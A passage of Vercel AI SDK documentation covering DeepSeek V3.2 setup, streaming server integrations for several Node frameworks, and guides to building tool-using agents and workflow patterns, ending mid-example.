With the release of DeepSeek V3.2, there has never been a better time to start building AI applications that require advanced reasoning and agentic capabilities.

DeepSeek V3.2

The series includes two primary variants:

DeepSeek V3.2: The official successor to V3.2-Exp. A balanced model optimized for both reasoning and inference efficiency, delivering GPT-5 level performance.
DeepSeek V3.2-Speciale: A high-compute variant with maxed-out reasoning capabilities that rivals Gemini-3.0-Pro. Achieves gold-medal performance in IMO 2025, CMO 2025, ICPC World Finals 2025, and IOI 2025. As of release, it does not support tool-use.

Benchmarks

DeepSeek V3.2 models excel in both reasoning and agentic tasks, delivering competitive performance across key benchmarks:

Reasoning Capabilities

AIME 2025 (Pass@1): 96.0% (Speciale)
HMMT 2025 (Pass@1): 99.2% (Speciale)
HLE (Pass@1): 30.6%
Codeforces (Rating): 2701 (Speciale)

Agentic Capabilities

SWE Verified (Resolved): 73.1%
Terminal Bench 2.0 (Acc): 46.4%
τ2 Bench (Pass@1): 80.3%
Tool Decathlon (Pass@1): 35.2%

Source

Model Options

When using DeepSeek V3.2 with the AI SDK, you have two model options:

Model Alias	Model Version	Description
`deepseek-chat`	DeepSeek-V3.2 (Non-thinking Mode)	Standard chat model
`deepseek-reasoner`	DeepSeek-V3.2 (Thinking Mode)	Enhanced reasoning for complex problem-solving

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building agents, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek V3.2 with the AI SDK:

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { text } = await generateText({
  model: deepseek('deepseek-chat'),
  prompt: 'Explain the concept of sparse attention in transformers.',
});

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building an agent with Next.js, the AI SDK, and DeepSeek V3.2:

In a new Next.js application, first install the AI SDK and the DeepSeek provider:

Then, create a route handler for the chat endpoint:

import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: deepseek('deepseek-reasoner'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({ sendReasoning: true });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            if (part.type === 'text' || part.type === 'reasoning') {
              return <div key={index}>{part.text}</div>;
            }
            return null;
          })}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Enhance Your Agent with Tools

Update Your Route Handler

Let's add a weather tool to your agent. Update your route handler at app/api/chat/route.ts:

import { deepseek } from '@ai-sdk/deepseek';
import {
  convertToModelMessages,
  stepCountIs,
  streamText,
  tool,
  UIMessage,
} from 'ai';
import { z } from 'zod';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: deepseek('deepseek-reasoner'),
    messages: await convertToModelMessages(messages),
    tools: {
      weather: tool({
        description: 'Get the weather in a location',
        inputSchema: z.object({
          location: z.string().describe('The location to get the weather for'),
        }),
        execute: async ({ location }) => ({
          location,
          temperature: 72,
          unit: 'fahrenheit',
        }),
      }),
    },
    stopWhen: stepCountIs(5),
  });

  return result.toUIMessageStreamResponse({ sendReasoning: true });
}

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Guides description: Learn how to build AI applications with the AI SDK

Guides

These use-case specific guides are intended to help you build real applications with the AI SDK.

title: Node.js HTTP Server description: Learn how to use the AI SDK in a Node.js HTTP server tags: ['api servers', 'streaming']

Node.js HTTP Server

You can use the AI SDK in a Node.js HTTP server to generate text and stream it to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/node-http-server

UI Message Stream

You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.

import { streamText } from 'ai';
import { createServer } from 'http';

createServer(async (req, res) => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeUIMessageStreamToResponse(res);
}).listen(8080);

Sending Custom Data

createUIMessageStream and pipeUIMessageStreamToResponse can be used to send custom data to the client.

import {
  createUIMessageStream,
  pipeUIMessageStreamToResponse,
  streamText,
} from 'ai';
import { createServer } from 'http';

createServer(async (req, res) => {
  switch (req.url) {
    case '/stream-data': {
      const stream = createUIMessageStream({
        execute: ({ writer }) => {
          // write some custom data
          writer.write({ type: 'start' });

          writer.write({
            type: 'data-custom',
            data: {
              custom: 'Hello, world!',
            },
          });

          const result = streamText({
            model: 'openai/gpt-4o',
            prompt: 'Invent a new holiday and describe its traditions.',
          });

          writer.merge(
            result.toUIMessageStream({
              sendStart: false,
              onError: error => {
                // Error messages are masked by default for security reasons.
                // If you want to expose the error message to the client, you can do so here:
                return error instanceof Error ? error.message : String(error);
              },
            }),
          );
        },
      });

      pipeUIMessageStreamToResponse({ stream, response: res });

      break;
    }
  }
}).listen(8080);

Text Stream

You can send a text stream to the client using pipeTextStreamToResponse.

import { streamText } from 'ai';
import { createServer } from 'http';

createServer(async (req, res) => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeTextStreamToResponse(res);
}).listen(8080);

Troubleshooting

Streaming not working when proxied

title: Express description: Learn how to use the AI SDK in an Express server tags: ['api servers', 'streaming']

Express

You can use the AI SDK in an Express server to generate and stream text and objects to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/express

UI Message Stream

You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.

import { streamText } from 'ai';
import express, { Request, Response } from 'express';

const app = express();

app.post('/', async (req: Request, res: Response) => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeUIMessageStreamToResponse(res);
});

app.listen(8080, () => {
  console.log(`Example app listening on port ${8080}`);
});

Sending Custom Data

pipeUIMessageStreamToResponse can be used to send custom data to the client.

import {
  createUIMessageStream,
  pipeUIMessageStreamToResponse,
  streamText,
} from 'ai';
import express, { Request, Response } from 'express';

const app = express();

app.post('/custom-data-parts', async (req: Request, res: Response) => {
  pipeUIMessageStreamToResponse({
    response: res,
    stream: createUIMessageStream({
      execute: async ({ writer }) => {
        writer.write({ type: 'start' });

        writer.write({
          type: 'data-custom',
          data: {
            custom: 'Hello, world!',
          },
        });

        const result = streamText({
          model: 'openai/gpt-4o',
          prompt: 'Invent a new holiday and describe its traditions.',
        });

        writer.merge(result.toUIMessageStream({ sendStart: false }));
      },
    }),
  });
});

app.listen(8080, () => {
  console.log(`Example app listening on port ${8080}`);
});

Text Stream

You can send a text stream to the client using pipeTextStreamToResponse.

import { streamText } from 'ai';
import express, { Request, Response } from 'express';

const app = express();

app.post('/', async (req: Request, res: Response) => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeTextStreamToResponse(res);
});

app.listen(8080, () => {
  console.log(`Example app listening on port ${8080}`);
});

Troubleshooting

Streaming not working when proxied

title: Hono description: Example of using the AI SDK in a Hono server. tags: ['api servers', 'streaming']

Hono

You can use the AI SDK in a Hono server to generate and stream text and objects to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/hono

UI Message Stream

You can use the toUIMessageStreamResponse method to create a properly formatted streaming response.

import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';

const app = new Hono();

app.post('/', async c => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });
  return result.toUIMessageStreamResponse();
});

serve({ fetch: app.fetch, port: 8080 });

Text Stream

You can use the toTextStreamResponse method to return a text stream response.

import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';

const app = new Hono();

app.post('/text', async c => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Write a short poem about coding.',
  });
  return result.toTextStreamResponse();
});

serve({ fetch: app.fetch, port: 8080 });

Sending Custom Data

You can use createUIMessageStream and createUIMessageStreamResponse to send custom data to the client.

import { serve } from '@hono/node-server';
import {
  createUIMessageStream,
  createUIMessageStreamResponse,
  streamText,
} from 'ai';
import { Hono } from 'hono';

const app = new Hono();

app.post('/stream-data', async c => {
  // immediately start streaming the response
  const stream = createUIMessageStream({
    execute: ({ writer }) => {
      writer.write({ type: 'start' });

      writer.write({
        type: 'data-custom',
        data: {
          custom: 'Hello, world!',
        },
      });

      const result = streamText({
        model: 'openai/gpt-4o',
        prompt: 'Invent a new holiday and describe its traditions.',
      });

      writer.merge(
        result.toUIMessageStream({
          sendStart: false,
          onError: error => {
            // Error messages are masked by default for security reasons.
            // If you want to expose the error message to the client, you can do so here:
            return error instanceof Error ? error.message : String(error);
          },
        }),
      );
    },
  });
  return createUIMessageStreamResponse({ stream });
});

serve({ fetch: app.fetch, port: 8080 });

Troubleshooting

Streaming not working when proxied

title: Fastify description: Learn how to use the AI SDK in a Fastify server tags: ['api servers', 'streaming']

Fastify

You can use the AI SDK in a Fastify server to generate and stream text and objects to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/fastify

UI Message Stream

You can use the toUIMessageStream method to get a UI message stream from the result and then pipe it to the response.

import { streamText } from 'ai';
import Fastify from 'fastify';

const fastify = Fastify({ logger: true });

fastify.post('/', async function (request, reply) {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  reply.header('Content-Type', 'text/plain; charset=utf-8');

  return reply.send(result.toUIMessageStream());
});

fastify.listen({ port: 8080 });

Sending Custom Data

createUIMessageStream can be used to send custom data to the client.

import { createUIMessageStream, streamText } from 'ai';
import Fastify from 'fastify';

const fastify = Fastify({ logger: true });

fastify.post('/stream-data', async function (request, reply) {
  // immediately start streaming the response
  const stream = createUIMessageStream({
    execute: async ({ writer }) => {
      writer.write({ type: 'start' });

      writer.write({
        type: 'data-custom',
        data: {
          custom: 'initialized call',
        },
      });

      const result = streamText({
        model: 'openai/gpt-4o',
        prompt: 'Invent a new holiday and describe its traditions.',
      });

      writer.merge(result.toUIMessageStream({ sendStart: false }));
    },
    onError: error => {
      // Error messages are masked by default for security reasons.
      // If you want to expose the error message to the client, you can do so here:
      return error instanceof Error ? error.message : String(error);
    },
  });

  reply.header('Content-Type', 'text/plain; charset=utf-8');

  return reply.send(stream);
});

fastify.listen({ port: 8080 });

Text Stream

You can use the textStream property to get a text stream from the result and then pipe it to the response.

import { streamText } from 'ai';
import Fastify from 'fastify';

const fastify = Fastify({ logger: true });

fastify.post('/', async function (request, reply) {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  reply.header('Content-Type', 'text/plain; charset=utf-8');

  return reply.send(result.textStream);
});

fastify.listen({ port: 8080 });

Troubleshooting

Streaming not working when proxied

title: Nest.js description: Learn how to use the AI SDK in a Nest.js server tags: ['api servers', 'streaming']

Nest.js

You can use the AI SDK in a Nest.js server to generate and stream text and objects to the client.

Examples

The examples show how to implement a Nest.js controller that uses the AI SDK to stream text and objects to the client.

Full example: github.com/vercel/ai/examples/nest

UI Message Stream

You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.

import { Controller, Post, Res } from '@nestjs/common';
import { streamText } from 'ai';
import { Response } from 'express';

@Controller()
export class AppController {
  @Post('/')
  async root(@Res() res: Response) {
    const result = streamText({
      model: 'openai/gpt-4o',
      prompt: 'Invent a new holiday and describe its traditions.',
    });

    result.pipeUIMessageStreamToResponse(res);
  }
}

Sending Custom Data

createUIMessageStream and pipeUIMessageStreamToResponse can be used to send custom data to the client.

import { Controller, Post, Res } from '@nestjs/common';
import {
  createUIMessageStream,
  streamText,
  pipeUIMessageStreamToResponse,
} from 'ai';
import { Response } from 'express';

@Controller()
export class AppController {
  @Post('/stream-data')
  async streamData(@Res() response: Response) {
    const stream = createUIMessageStream({
      execute: ({ writer }) => {
        // write some data
        writer.write({ type: 'start' });

        writer.write({
          type: 'data-custom',
          data: {
            custom: 'Hello, world!',
          },
        });

        const result = streamText({
          model: 'openai/gpt-4o',
          prompt: 'Invent a new holiday and describe its traditions.',
        });
        writer.merge(
          result.toUIMessageStream({
            sendStart: false,
            onError: error => {
              // Error messages are masked by default for security reasons.
              // If you want to expose the error message to the client, you can do so here:
              return error instanceof Error ? error.message : String(error);
            },
          }),
        );
      },
    });
    pipeUIMessageStreamToResponse({ stream, response });
  }
}

Text Stream

You can use the pipeTextStreamToResponse method to get a text stream from the result and then pipe it to the response.

import { Controller, Post, Res } from '@nestjs/common';
import { streamText } from 'ai';
import { Response } from 'express';

@Controller()
export class AppController {
  @Post()
  async example(@Res() res: Response) {
    const result = streamText({
      model: 'openai/gpt-4o',
      prompt: 'Invent a new holiday and describe its traditions.',
    });

    result.pipeTextStreamToResponse(res);
  }
}

Troubleshooting

Streaming not working when proxied

title: AI SDK by Vercel description: The AI SDK is the TypeScript toolkit for building AI applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.

AI SDK

The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.

Why use the AI SDK?

Integrating large language models (LLMs) into applications is complicated and heavily dependent on the specific model provider you use.

For example, here’s how you can generate text with various models using the AI SDK:

The AI SDK has two main libraries:

AI SDK Core: A unified API for generating text, structured objects, tool calls, and building agents with LLMs.
AI SDK UI: A set of framework-agnostic hooks for quickly building chat and generative user interface.

Model Providers

The AI SDK supports multiple model providers.

Templates

We've built some templates that include AI SDK integrations for different use cases, providers, and frameworks. You can use these templates to get started with your AI-powered application.

Starter Kits

Feature Exploration

Frameworks

Generative UI

Security

Join our Community

If you have questions about anything related to the AI SDK, you're always welcome to ask our community on the Vercel Community.

`llms.txt` (for Cursor, Windsurf, Copilot, Claude etc.)

Example Usage

For instance, to prompt an LLM with questions about the AI SDK:

Copy the documentation contents from ai-sdk.dev/llms.txt
Use the following prompt format:

Documentation:
{paste documentation here}
---
Based on the above documentation, answer the following:
{your question}

title: Overview description: Learn how to build agents with the AI SDK.

Agents

Agents are large language models (LLMs) that use tools in a loop to accomplish tasks.

These components work together:

LLMs process input and decide the next action
Tools extend capabilities beyond text generation (reading files, calling APIs, writing to databases)
Loop orchestrates execution through:
- Context management - Maintaining conversation history and deciding what the model sees (input) at each step
- Stopping conditions - Determining when the loop (task) is complete

ToolLoopAgent Class

The ToolLoopAgent class handles these three components. Here's an agent that uses multiple tools in a loop to accomplish a task:

import { ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const weatherAgent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather in a location (in Fahrenheit)',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
    convertFahrenheitToCelsius: tool({
      description: 'Convert temperature from Fahrenheit to Celsius',
      inputSchema: z.object({
        temperature: z.number().describe('Temperature in Fahrenheit'),
      }),
      execute: async ({ temperature }) => {
        const celsius = Math.round((temperature - 32) * (5 / 9));
        return { celsius };
      },
    }),
  },
});

const result = await weatherAgent.generate({
  prompt: 'What is the weather in San Francisco in celsius?',
});

console.log(result.text); // agent's final answer
console.log(result.steps); // steps taken by the agent

The agent automatically:

Calls the weather tool to get the temperature in Fahrenheit
Calls convertFahrenheitToCelsius to convert it
Generates a final text response with the result

The ToolLoopAgent handles the loop, context management, and stopping conditions.

Why Use the ToolLoopAgent?

The ToolLoopAgent is the recommended approach for building agents with the AI SDK because it:

Reduces boilerplate - Manages loops and message arrays
Improves reusability - Define once, use throughout your application
Simplifies maintenance - Single place to update agent configuration

For most use cases, start with the ToolLoopAgent. Use core functions (generateText, streamText) when you need explicit control over each step for complex structured workflows.

Structured Workflows

Agents are flexible and powerful, but non-deterministic. When you need reliable, repeatable outcomes with explicit control flow, use core functions with structured workflow patterns combining:

Conditional statements for explicit branching
Standard functions for reusable logic
Error handling for robustness
Explicit control flow for predictability

Explore workflow patterns to learn more about building structured, reliable systems.

Next Steps

Building Agents - Guide to creating agents with the ToolLoopAgent
Workflow Patterns - Structured patterns using core functions for complex workflows
Loop Control - Execution control with stopWhen and prepareStep

title: Building Agents description: Complete guide to creating agents with the ToolLoopAgent.

Building Agents

The ToolLoopAgent provides a structured way to encapsulate LLM configuration, tools, and behavior into reusable components. It handles the agent loop for you, allowing the LLM to call tools multiple times in sequence to accomplish complex tasks. Define agents once and use them across your application.

Why Use the ToolLoopAgent Class?

When building AI applications, you often need to:

Reuse configurations - Same model settings, tools, and prompts across different parts of your application
Maintain consistency - Ensure the same behavior and capabilities throughout your codebase
Simplify API routes - Reduce boilerplate in your endpoints
Type safety - Get full TypeScript support for your agent's tools and outputs

The ToolLoopAgent class provides a single place to define your agent's behavior.

Creating an Agent

Define an agent by instantiating the ToolLoopAgent class with your desired configuration:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const myAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: 'You are a helpful assistant.',
  tools: {
    // Your tools here
  },
});

Configuration Options

The ToolLoopAgent accepts all the same settings as generateText and streamText. Configure:

Model and System Instructions

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: 'You are an expert software engineer.',
});

Tools

Provide tools that the agent can use to accomplish tasks:

import { ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const codeAgent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    runCode: tool({
      description: 'Execute Python code',
      inputSchema: z.object({
        code: z.string(),
      }),
      execute: async ({ code }) => {
        // Execute code and return result
        return { output: 'Code executed successfully' };
      },
    }),
  },
});

Loop Control

By default, agents run for 20 steps (stopWhen: stepCountIs(20)). In each step, the model either generates text or calls a tool. If it generates text, the agent completes. If it calls a tool, the AI SDK executes that tool.

You can configure stopWhen differently to allow more steps. After each tool execution, the agent triggers a new generation where the model can call another tool or generate text:

import { ToolLoopAgent, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  stopWhen: stepCountIs(50), // Increase default from 20 to 50.
});

Each step represents one generation (which results in either text or a tool call). The loop continues until:

A finish reasoning other than tool-calls is returned, or
A tool that is invoked does not have an execute function, or
A tool call needs approval, or
A stop condition is met

You can combine multiple conditions:

import { ToolLoopAgent, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  stopWhen: [
    stepCountIs(20), // Maximum 20 steps
    yourCustomCondition(), // Custom logic for when to stop
  ],
});

Learn more about loop control and stop conditions.

Tool Choice

Control how the agent uses tools:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    // your tools here
  },
  toolChoice: 'required', // Force tool use
  // or toolChoice: 'none' to disable tools
  // or toolChoice: 'auto' (default) to let the model decide
});

You can also force the use of a specific tool:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    weather: weatherTool,
    cityAttractions: attractionsTool,
  },
  toolChoice: {
    type: 'tool',
    toolName: 'weather', // Force the weather tool to be used
  },
});

Structured Output

Define structured output schemas:

import { ToolLoopAgent, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const analysisAgent = new ToolLoopAgent({
  model: __MODEL__,
  output: Output.object({
    schema: z.object({
      sentiment: z.enum(['positive', 'neutral', 'negative']),
      summary: z.string(),
      keyPoints: z.array(z.string()),
    }),
  }),
});

const { output } = await analysisAgent.generate({
  prompt: 'Analyze customer feedback from the last quarter',
});

Define Agent Behavior with System Instructions

System instructions define your agent's behavior, personality, and constraints. They set the context for all interactions and guide how the agent responds to user queries and uses tools.

Basic System Instructions

Set the agent's role and expertise:

const agent = new ToolLoopAgent({
  model: __MODEL__,
  instructions:
    'You are an expert data analyst. You provide clear insights from complex data.',
});

Detailed Behavioral Instructions

Provide specific guidelines for agent behavior:

const codeReviewAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: `You are a senior software engineer conducting code reviews.

  Your approach:
  - Focus on security vulnerabilities first
  - Identify performance bottlenecks
  - Suggest improvements for readability and maintainability
  - Be constructive and educational in your feedback
  - Always explain why something is an issue and how to fix it`,
});

Constrain Agent Behavior

Set boundaries and ensure consistent behavior:

const customerSupportAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: `You are a customer support specialist for an e-commerce platform.

  Rules:
  - Never make promises about refunds without checking the policy
  - Always be empathetic and professional
  - If you don't know something, say so and offer to escalate
  - Keep responses concise and actionable
  - Never share internal company information`,
  tools: {
    checkOrderStatus,
    lookupPolicy,
    createTicket,
  },
});

Tool Usage Instructions

Guide how the agent should use available tools:

const researchAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: `You are a research assistant with access to search and document tools.

  When researching:
  1. Always start with a broad search to understand the topic
  2. Use document analysis for detailed information
  3. Cross-reference multiple sources before drawing conclusions
  4. Cite your sources when presenting information
  5. If information conflicts, present both viewpoints`,
  tools: {
    webSearch,
    analyzeDocument,
    extractQuotes,
  },
});

Format and Style Instructions

Control the output format and communication style:

const technicalWriterAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: `You are a technical documentation writer.

  Writing style:
  - Use clear, simple language
  - Avoid jargon unless necessary
  - Structure information with headers and bullet points
  - Include code examples where relevant
  - Write in second person ("you" instead of "the user")

  Always format responses in Markdown.`,
});

Using an Agent

Once defined, you can use your agent in three ways:

Generate Text

Use generate() for one-time text generation:

const result = await myAgent.generate({
  prompt: 'What is the weather like?',
});

console.log(result.text);

Stream Text

Use stream() for streaming responses:

const result = await myAgent.stream({
  prompt: 'Tell me a story',
});

for await (const chunk of result.textStream) {
  console.log(chunk);
}

Respond to UI Messages

Use createAgentUIStreamResponse() to create API responses for client applications:

// In your API route (e.g., app/api/chat/route.ts)
import { createAgentUIStreamResponse } from 'ai';

export async function POST(request: Request) {
  const { messages } = await request.json();

  return createAgentUIStreamResponse({
    agent: myAgent,
    uiMessages: messages,
  });
}

Track Step Progress

Use onStepFinish to track each step's progress, including token usage. The callback receives a stepNumber (zero-based) to identify which step just completed:

const result = await myAgent.generate({
  prompt: 'Research and summarize the latest AI trends',
  onStepFinish: async ({ stepNumber, usage, finishReason, toolCalls }) => {
      console.log(`Step ${stepNumber} completed:`, {
      inputTokens: usage.inputTokens,
      outputTokens: usage.outputTokens,
      finishReason,
      toolsUsed: toolCalls?.map(tc => tc.toolName),
    });
  },
});

You can also define onStepFinish in the constructor for agent-wide tracking. When both constructor and method callbacks are provided, both are called (constructor first, then the method callback):

const agent = new ToolLoopAgent({
  model: __MODEL__,
  onStepFinish: async ({ stepNumber, usage }) => {
    // Agent-wide logging
    console.log(`Agent step ${stepNumber}:`, usage.totalTokens);
  },
});

// Method-level callback runs after constructor callback
const result = await agent.generate({
  prompt: 'Hello',
  onStepFinish: async ({ stepNumber, usage }) => {
    // Per-call tracking (e.g., for billing)
    await trackUsage(stepNumber, usage);
  },
});

End-to-end Type Safety

You can infer types for your agent's UIMessages:

import { ToolLoopAgent, InferAgentUIMessage } from 'ai';

const myAgent = new ToolLoopAgent({
  // ... configuration
});

// Infer the UIMessage type for UI components or persistence
export type MyAgentUIMessage = InferAgentUIMessage<typeof myAgent>;

Use this type in your client components with useChat:

'use client';

import { useChat } from '@ai-sdk/react';
import type { MyAgentUIMessage } from '@/agent/my-agent';

export function Chat() {
  const { messages } = useChat<MyAgentUIMessage>();
  // Full type safety for your messages and tools
}

Next Steps

Now that you understand building agents, you can:

Explore workflow patterns for structured patterns using core functions
Learn about loop control for advanced execution control
See manual loop examples for custom workflow implementations

title: Workflow Patterns description: Learn workflow patterns for building reliable agents with the AI SDK.

Workflow Patterns

Combine the building blocks from the overview with these patterns to add structure and reliability to your agents:

Sequential Processing - Steps executed in order
Parallel Processing - Independent tasks run simultaneously
Evaluation/Feedback Loops - Results checked and improved iteratively
Orchestration - Coordinating multiple components
Routing - Directing work based on context

Choose Your Approach

Consider these key factors:

Flexibility vs Control - How much freedom does the LLM need vs how tightly you must constrain its actions?
Error Tolerance - What are the consequences of mistakes in your use case?
Cost Considerations - More complex systems typically mean more LLM calls and higher costs
Maintenance - Simpler architectures are easier to debug and modify

Start with the simplest approach that meets your needs. Add complexity only when required by:

Breaking down tasks into clear steps
Adding tools for specific capabilities
Implementing feedback loops for quality control
Introducing multiple agents for complex workflows

Let's look at examples of these patterns in action.

Patterns with Examples

Sequential Processing (Chains)

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function generateMarketingCopy(input: string) {
  const model = __MODEL__;

  // First step: Generate marketing copy
  const { text: copy } = await generateText({
    model,
    prompt: `Write persuasive marketing copy for: ${input}. Focus on benefits and emotional appeal.`,
  });

  // Perform quality check on copy
  const { output: qualityMetrics } = await generateText({
    model,
    output: Output.object({
      schema: z.object({
        hasCallToAction: z.boolean(),
        emotionalAppeal: z.number().min(1).max(10),
        clarity: z.number().min(1).max(10),
      }),
    }),
    prompt: `Evaluate this marketing copy for:
    1. Presence of call to action (true/false)
    2. Emotional appeal (1-10)
    3. Clarity (1-10)

    Copy to evaluate: ${copy}`,
  });

  // If quality check fails, regenerate with more specific instructions
  if (
    !qualityMetrics.hasCallToAction ||
    qualityMetrics.emotionalAppeal < 7 ||
    qualityMetrics.clarity < 7
  ) {
    const { text: improvedCopy } = await generateText({
      model,
      prompt: `Rewrite this marketing copy with:
      ${!qualityMetrics.hasCallToAction ? '- A clear call to action' : ''}
      ${qualityMetrics.emotionalAppeal < 7 ? '- Stronger emotional appeal' : ''}
      ${qualityMetrics.clarity < 7 ? '- Improved clarity and directness' : ''}

      Original copy: ${copy}`,
    });
    return { copy: improvedCopy, qualityMetrics };
  }

  return { copy, qualityMetrics };
}

Routing

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function handleCustomerQuery(query: string) {
  const model = __MODEL__;

  // First step: Classify the query type
  const { output: classification } = await generateText({
    model,
    output: Output.object({
      schema: z.object({
        reasoning: z.string(),
        type: z.enum(['general', 'refund', 'technical']),
        complexity: z.enum(['simple', 'complex']),
      }),
    }),
    prompt: `Classify this customer query:
    ${query}

    Determine:
    1. Query type (general, refund, or technical)
    2. Complexity (simple or complex)
    3. Brief reasoning for classification`,
  });

  // Route based on classification
  // Set model and system prompt based on query type and complexity
  const { text: response } = await generateText({
    model:
      classification.complexity === 'simple'
        ? 'openai/gpt-4o-mini'
        : 'openai/o4-mini',
    system: {
      general:
        'You are an expert customer service agent handling general inquiries.',
      refund:
        'You are a customer service agent specializing in refund requests. Follow company policy and collect necessary information.',
      technical:
        'You are a technical support specialist with deep product knowledge. Focus on clear step-by-step troubleshooting.',
    }[classification.type],
    prompt: query,
  });

  return { response, classification };
}

Parallel Processing

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

// Example: Parallel code review with multiple specialized reviewers
async function parallelCodeReview(code: string) {
  const model = __MODEL__;

  // Run parallel reviews
  const [securityReview, performanceReview, maintainabilityReview] =
    await Promise.all([
      generateText({
        model,
        system:
          'You are an expert in code security. Focus on identifying security vulnerabilities, injection risks, and authentication issues.',
        output: Output.object({
          schema: z.object({
            vulnerabilities: z.array(z.string()),
            riskLevel: z.enum(['low', 'medium', 'high']),
            suggestions: z.array(z.string()),
          }),
        }),
        prompt: `Review this code:
      ${code}`,
      }),

      generateText({
        model,
        system:
          'You are an expert in code performance. Focus on identifying performance bottlenecks, memory leaks, and optimization opportunities.',
        output: Output.object({
          schema: z.object({
            issues: z.array(z.string()),
            impact: z.enum(['low', 'medium', 'high']),
            optimizations: z.array(z.string()),
          }),
        }),
        prompt: `Review this code:
      ${code}`,
      }),

      generateText({
        model,
        system:
          'You are an expert in code quality. Focus on code structure, readability, and adherence to best practices.',
        output: Output.object({
          schema: z.object({
            concerns: z.array(z.string()),
            qualityScore: z.number().min(1).max(10),
            recommendations: z.array(z.string()),
          }),
        }),
        prompt: `Review this code:
      ${code}`,
      }),
    ]);

  const reviews = [
    { ...securityReview.output, type: 'security' },
    { ...performanceReview.output, type: 'performance' },
